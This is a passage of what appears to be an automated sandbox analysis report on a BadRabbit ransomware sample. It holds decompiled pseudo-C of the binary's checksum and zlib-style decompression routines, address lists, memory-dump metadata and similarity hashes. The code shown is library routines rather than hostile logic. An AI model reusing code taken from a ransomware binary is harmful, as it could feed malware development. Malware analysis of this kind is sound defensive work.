* 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t171 >> 0x18) * 4) ^  *(0x885718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t235 >> 0x18) * 4) ^  *(0x885718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t171 >> 0x18) * 4) ^  *(0x885718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t171 >> 0x18) * 4) ^  *(0x885718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t235 >> 0x18) * 4) ^  *(0x885718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t177 >> 0x18) * 4) ^  *(0x885718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t241 >> 0x18) * 4) ^  *(0x885718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t171 >> 0x18) * 4) ^  *(0x885718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t171 >> 0x18) * 4) ^  *(0x885718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t235 >> 0x18) * 4) ^  *(0x885718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t171 >> 0x18) * 4) ^  *(0x885718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (( *(0x884f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x885318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x884b18 + (_t165 >> 0x18) * 4) ^  *(0x885718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t229 >> 0x18) * 4) ^  *(0x885718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t171 >> 0x18) * 4) ^  *(0x885718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t235 >> 0x18) * 4) ^  *(0x885718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t177 >> 0x18) * 4) ^  *(0x885718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t241 >> 0x18) * 4) ^  *(0x885718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t183 >> 0x18) * 4) ^  *(0x885718 + (_t183 & 0x000000ff) * 4) ^ _t250[6]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (_t247 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t247 >> 0x18) * 4) ^  *(0x885718 + (_t247 & 0x000000ff) * 4);
                                                                                                          						_t84 =  &_a4;
                                                                                                          						 *_t84 = _a4 - 1;
                                                                                                          						if( *_t84 == 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						_t189 = _a8;
                                                                                                          						_t222 = 0xff;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				if(_t248 >= 4) {
                                                                                                          					_t224 = _t248 >> 2;
                                                                                                          					do {
                                                                                                          						_t164 = _t161 ^  *_t249;
                                                                                                          						_t248 = _t248 - 4;
                                                                                                          						_t249 =  &(_t249[4]);
                                                                                                          						_t161 =  *(0x884f18 + (_t164 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x885318 + (_t164 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x884b18 + (_t164 >> 0x18) * 4) ^  *(0x885718 + (_t164 & 0x000000ff) * 4);
                                                                                                          						_t224 = _t224 - 1;
                                                                                                          					} while (_t224 != 0);
                                                                                                          				}
                                                                                                          				if(_t248 != 0) {
                                                                                                          					do {
                                                                                                          						_t161 = _t161 >> 0x00000008 ^  *(0x884b18 + (( *_t249 & 0x000000ff ^ _t161) & 0x000000ff) * 4);
                                                                                                          						_t249 =  &(_t249[1]);
                                                                                                          						_t248 = _t248 - 1;
                                                                                                          					} while (_t248 != 0);
                                                                                                          				}
                                                                                                          				return  !_t161;
                                                                                                          			}












                                                                                                          0x008830e6
                                                                                                          0x008830e9
                                                                                                          0x008830f4
                                                                                                          0x008830f7
                                                                                                          0x008830f9
                                                                                                          0x008830fb
                                                                                                          0x008830fb
                                                                                                          0x008830fe
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00883100
                                                                                                          0x00883103
                                                                                                          0x0088310f
                                                                                                          0x00883116
                                                                                                          0x00883117
                                                                                                          0x00000000
                                                                                                          0x00883117
                                                                                                          0x00000000
                                                                                                          0x00883103
                                                                                                          0x0088311d
                                                                                                          0x0088331b
                                                                                                          0x00883123
                                                                                                          0x00883128
                                                                                                          0x00883135
                                                                                                          0x00883135
                                                                                                          0x0088313a
                                                                                                          0x00883146
                                                                                                          0x0088325e
                                                                                                          0x0088326d
                                                                                                          0x008832d5
                                                                                                          0x008832d8
                                                                                                          0x008832dd
                                                                                                          0x00883309
                                                                                                          0x00883310
                                                                                                          0x00883310
                                                                                                          0x00883313
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088312d
                                                                                                          0x00883130
                                                                                                          0x00883130
                                                                                                          0x00883319
                                                                                                          0x00883321
                                                                                                          0x00883325
                                                                                                          0x00883328
                                                                                                          0x00883328
                                                                                                          0x0088332a
                                                                                                          0x00883334
                                                                                                          0x00883369
                                                                                                          0x0088336b
                                                                                                          0x0088336b
                                                                                                          0x00883328
                                                                                                          0x00883370
                                                                                                          0x00883372
                                                                                                          0x0088337f
                                                                                                          0x00883386
                                                                                                          0x00883387
                                                                                                          0x00883387
                                                                                                          0x00883372
                                                                                                          0x00883392

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8 Oqt
                                                                                                          • API String ID: 0-3989543947
                                                                                                          • Opcode ID: 01401ee62f3c23008b059f7e9cf206357f29c5e0e239e5d4c92060fa1f21fc17
                                                                                                          • Instruction ID: 6641d1861171fe3be1ceb4069ac4ae359c89941d4557ca8a51995878497c4be8
                                                                                                          • Opcode Fuzzy Hash: 01401ee62f3c23008b059f7e9cf206357f29c5e0e239e5d4c92060fa1f21fc17
                                                                                                          • Instruction Fuzzy Hash: AF718036760A429BD718DF1EECD052A73A2F78D31074A853DEA06C7391C635EA22CBD0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 746 881f3b-881f4d 747 881f7f-881f90 746->747 748 881f4f 746->748 750 881f9e-881fba 747->750 751 881f92 747->751 749 881f52-881f57 748->749 752 881f5d-881f7d 749->752 753 882a52-882a7a 749->753 750->753 754 881fc0-881fcb 750->754 751->750 752->747 752->749 755 882a7c-882a7f 753->755 756 882a91-882aa5 call 882dcb 753->756 757 881fcd-881fde 754->757 758 882012 754->758 759 882a81-882a84 755->759 760 882ab6-882ace 755->760 771 882ab4 756->771 772 882aa7-882aaf 756->772 762 882a4f 757->762 763 881fe4-88200a memcpy 757->763 758->762 759->760 764 882a86-882a89 759->764 766 882ad0-882ad2 760->766 767 882af7-882afa 760->767 762->753 763->758 764->756 770 882a8b-882a8f 764->770 766->767 773 882ad4-882ae1 766->773 768 882afc-882aff 767->768 769 882b01 767->769 768->769 774 882b06-882b2f 768->774 769->774 770->756 770->760 771->760 778 881dd3-881dd9 772->778 776 882aea call 882e91 773->776 777 882ae3-882ae8 call 8830c1 773->777 779 882b31-882b33 774->779 780 882b35-882b39 774->780 783 882aef-882af4 776->783 777->783 779->780 784 882b3b-882b46 779->784 780->784 785 882b4b-882b4e 780->785 783->767 784->778 785->778
                                                                                                          C-Code - Quality: 76%
                                                                                                          			E00881F3B(signed int* __ebx, unsigned int __edx, signed int __edi, void* __esi) {
                                                                                                          				signed int _t753;
                                                                                                          				int _t763;
                                                                                                          				int _t765;
                                                                                                          				int _t770;
                                                                                                          				int _t771;
                                                                                                          				signed int _t774;
                                                                                                          				int _t775;
                                                                                                          				void* _t796;
                                                                                                          				int _t797;
                                                                                                          				int _t799;
                                                                                                          				signed int* _t800;
                                                                                                          				signed char _t803;
                                                                                                          				signed int _t805;
                                                                                                          				int _t806;
                                                                                                          				void* _t811;
                                                                                                          				signed int _t822;
                                                                                                          				int _t824;
                                                                                                          				signed int _t833;
                                                                                                          				intOrPtr _t834;
                                                                                                          				int _t835;
                                                                                                          				void* _t837;
                                                                                                          				intOrPtr* _t838;
                                                                                                          				void* _t841;
                                                                                                          				void* _t843;
                                                                                                          
                                                                                                          				L0:
                                                                                                          				while(1) {
                                                                                                          					L0:
                                                                                                          					_t837 = __esi;
                                                                                                          					_t800 = __ebx;
                                                                                                          					_t803 = __edi & 0x00000007;
                                                                                                          					_t833 = __edi - _t803;
                                                                                                          					_t822 = __edx >> _t803;
                                                                                                          					 *(_t841 - 0xc) = _t822;
                                                                                                          					 *(_t841 - 0x10) = _t833;
                                                                                                          					if(_t833 >= 0x20) {
                                                                                                          						goto L168;
                                                                                                          					}
                                                                                                          					L165:
                                                                                                          					__eax =  *(__ebp - 8);
                                                                                                          					while(1) {
                                                                                                          						L166:
                                                                                                          						__ecx =  *(__ebp - 4);
                                                                                                          						if(__ecx == 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						L167:
                                                                                                          						__eax =  *__eax & 0x000000ff;
                                                                                                          						 *(__ebp - 4) = __ecx;
                                                                                                          						__ecx = __edi;
                                                                                                          						__eax = __eax << __cl;
                                                                                                          						__edi = __edi + 8;
                                                                                                          						__edx = __eax + __edx;
                                                                                                          						 *(__ebp - 0x10) = __edi;
                                                                                                          						__eax =  *(__ebp - 8);
                                                                                                          						__eax =  *(__ebp - 8) + 1;
                                                                                                          						 *(__ebp - 0xc) = __edx;
                                                                                                          						 *(__ebp - 8) = __eax;
                                                                                                          						if(__edi < 0x20) {
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						goto L168;
                                                                                                          					}
                                                                                                          					L323:
                                                                                                          					_t712 = _t841 + 8; // 0x38
                                                                                                          					_t838 =  *_t712;
                                                                                                          					 *(_t838 + 0xc) =  *(_t841 - 0x1c);
                                                                                                          					_t716 = _t841 - 8; // 0x38
                                                                                                          					 *((intOrPtr*)(_t838 + 0x10)) =  *((intOrPtr*)(_t841 - 0x18));
                                                                                                          					_t824 = 0;
                                                                                                          					 *_t838 =  *_t716;
                                                                                                          					 *(_t838 + 4) = _t806;
                                                                                                          					_t800[0xf] = _t833;
                                                                                                          					_t834 =  *((intOrPtr*)(_t841 - 0x28));
                                                                                                          					_t800[0xe] =  *(_t841 - 0xc);
                                                                                                          					if(_t800[0xa] != 0) {
                                                                                                          						L328:
                                                                                                          						_t763 = E00882DCB(_t838,  *(_t838 + 0xc), _t834 -  *((intOrPtr*)(_t838 + 0x10)));
                                                                                                          						if(_t763 == 0) {
                                                                                                          							L331:
                                                                                                          							_t824 = 0;
                                                                                                          							L332:
                                                                                                          							_t765 =  *(_t841 - 0x38) -  *(_t838 + 4);
                                                                                                          							_t835 = _t834 -  *((intOrPtr*)(_t838 + 0x10));
                                                                                                          							 *((intOrPtr*)(_t838 + 8)) =  *((intOrPtr*)(_t838 + 8)) + _t765;
                                                                                                          							 *((intOrPtr*)(_t838 + 0x14)) =  *((intOrPtr*)(_t838 + 0x14)) + _t835;
                                                                                                          							_t800[7] = _t800[7] + _t835;
                                                                                                          							 *(_t841 - 0x38) = _t765;
                                                                                                          							if(_t800[2] != _t824) {
                                                                                                          								if(_t835 != 0) {
                                                                                                          									_push(_t835);
                                                                                                          									_push( *(_t838 + 0xc) - _t835);
                                                                                                          									_push(_t800[6]);
                                                                                                          									if(_t800[4] == _t824) {
                                                                                                          										_t774 = E00882E91();
                                                                                                          									} else {
                                                                                                          										_t774 = E008830C1();
                                                                                                          									}
                                                                                                          									_t800[6] = _t774;
                                                                                                          									_t824 = 0;
                                                                                                          									 *(_t838 + 0x30) = _t774;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							if( *_t800 == 0x13) {
                                                                                                          								L340:
                                                                                                          								_t824 = 0x100;
                                                                                                          								goto L341;
                                                                                                          							} else {
                                                                                                          								L339:
                                                                                                          								if( *_t800 != 0xe) {
                                                                                                          									L341:
                                                                                                          									 *((intOrPtr*)(_t841 + 8)) = 0x80;
                                                                                                          									asm("sbb ecx, ecx");
                                                                                                          									_t767 =  ==  ?  *((void*)(_t841 + 8)) : 0;
                                                                                                          									_t768 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824;
                                                                                                          									_t769 = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
                                                                                                          									 *((intOrPtr*)(_t838 + 0x2c)) = ( ==  ?  *((void*)(_t841 + 8)) : 0) + ( ~(_t800[1]) & 0x00000040) + _t824 + _t800[0xf];
                                                                                                          									if( *(_t841 - 0x38) != 0) {
                                                                                                          										L343:
                                                                                                          										if( *((intOrPtr*)(_t841 + 0xc)) != 4) {
                                                                                                          											L345:
                                                                                                          											_t770 =  *(_t841 - 0x20);
                                                                                                          											L138:
                                                                                                          											return _t770;
                                                                                                          										}
                                                                                                          										L344:
                                                                                                          										_t771 =  *(_t841 - 0x20);
                                                                                                          										_t811 = 0xfffffffb;
                                                                                                          										_t770 =  ==  ? _t811 : _t771;
                                                                                                          										goto L138;
                                                                                                          									}
                                                                                                          									L342:
                                                                                                          									if(_t835 == 0) {
                                                                                                          										goto L344;
                                                                                                          									}
                                                                                                          									goto L343;
                                                                                                          								}
                                                                                                          								goto L340;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						L329:
                                                                                                          						 *_t800 = 0x1e;
                                                                                                          						L330:
                                                                                                          						_push(0xfffffffc);
                                                                                                          						L137:
                                                                                                          						_pop(_t770);
                                                                                                          						goto L138;
                                                                                                          					}
                                                                                                          					L324:
                                                                                                          					if(_t834 ==  *((intOrPtr*)(_t838 + 0x10))) {
                                                                                                          						goto L332;
                                                                                                          					}
                                                                                                          					L325:
                                                                                                          					if( *_t800 >= 0x1d) {
                                                                                                          						goto L332;
                                                                                                          					}
                                                                                                          					L326:
                                                                                                          					if( *_t800 < 0x1a) {
                                                                                                          						goto L328;
                                                                                                          					}
                                                                                                          					L327:
                                                                                                          					if( *((intOrPtr*)(_t841 + 0xc)) == 4) {
                                                                                                          						goto L332;
                                                                                                          					}
                                                                                                          					goto L328;
                                                                                                          					L168:
                                                                                                          					_t805 = _t822 & 0x0000ffff;
                                                                                                          					if(_t805 ==  !_t822 >> 0x10) {
                                                                                                          						L170:
                                                                                                          						_t800[0x10] = _t805;
                                                                                                          						_t822 = 0;
                                                                                                          						_t806 =  *(_t841 - 4);
                                                                                                          						_t833 = 0;
                                                                                                          						 *(_t841 - 0xc) = 0;
                                                                                                          						 *(_t841 - 0x10) = 0;
                                                                                                          						 *_t800 = 0xe;
                                                                                                          						if( *((intOrPtr*)(_t841 + 0xc)) == 6) {
                                                                                                          							goto L323;
                                                                                                          						}
                                                                                                          						L171:
                                                                                                          						 *_t800 = 0xf;
                                                                                                          						L172:
                                                                                                          						_t775 = _t800[0x10];
                                                                                                          						if(_t775 == 0) {
                                                                                                          							L175:
                                                                                                          							 *_t800 = 0xb;
                                                                                                          							while(1) {
                                                                                                          								L135:
                                                                                                          								_t753 =  *_t800;
                                                                                                          								if(_t753 > 0x1e) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								L1:
                                                                                                          								switch( *((intOrPtr*)(_t753 * 4 +  &M00882B54))) {
                                                                                                          									case 0:
                                                                                                          										L2:
                                                                                                          										if(_t800[2] != 0) {
                                                                                                          											L4:
                                                                                                          											_push(0x10);
                                                                                                          											_pop(_t776);
                                                                                                          											__eflags = _t833 - _t776;
                                                                                                          											if(_t833 >= _t776) {
                                                                                                          												L8:
                                                                                                          												__eflags = _t800[2] & 0x00000002;
                                                                                                          												if((_t800[2] & 0x00000002) == 0) {
                                                                                                          													L11:
                                                                                                          													_t800[4] = _t800[4] & 0x00000000;
                                                                                                          													_t777 = _t800[8];
                                                                                                          													__eflags = _t777;
                                                                                                          													if(_t777 != 0) {
                                                                                                          														_t27 = _t777 + 0x30;
                                                                                                          														 *_t27 =  *(_t777 + 0x30) | 0xffffffff;
                                                                                                          														__eflags =  *_t27;
                                                                                                          													}
                                                                                                          													L13:
                                                                                                          													__eflags = _t800[2] & 0x00000001;
                                                                                                          													if((_t800[2] & 0x00000001) == 0) {
                                                                                                          														L24:
                                                                                                          														 *(_t837 + 0x18) = "incorrect header check";
                                                                                                          														goto L17;
                                                                                                          													}
                                                                                                          													L14:
                                                                                                          													_t780 = (_t822 >> 8) + ((_t822 & 0x000000ff) << 8);
                                                                                                          													_push(0x1f);
                                                                                                          													_pop(_t814);
                                                                                                          													__eflags = _t780 % _t814;
                                                                                                          													_t822 =  *(_t841 - 0xc);
                                                                                                          													if(_t780 % _t814 != 0) {
                                                                                                          														goto L24;
                                                                                                          													}
                                                                                                          													L15:
                                                                                                          													__eflags = (_t822 & 0x0000000f) - 8;
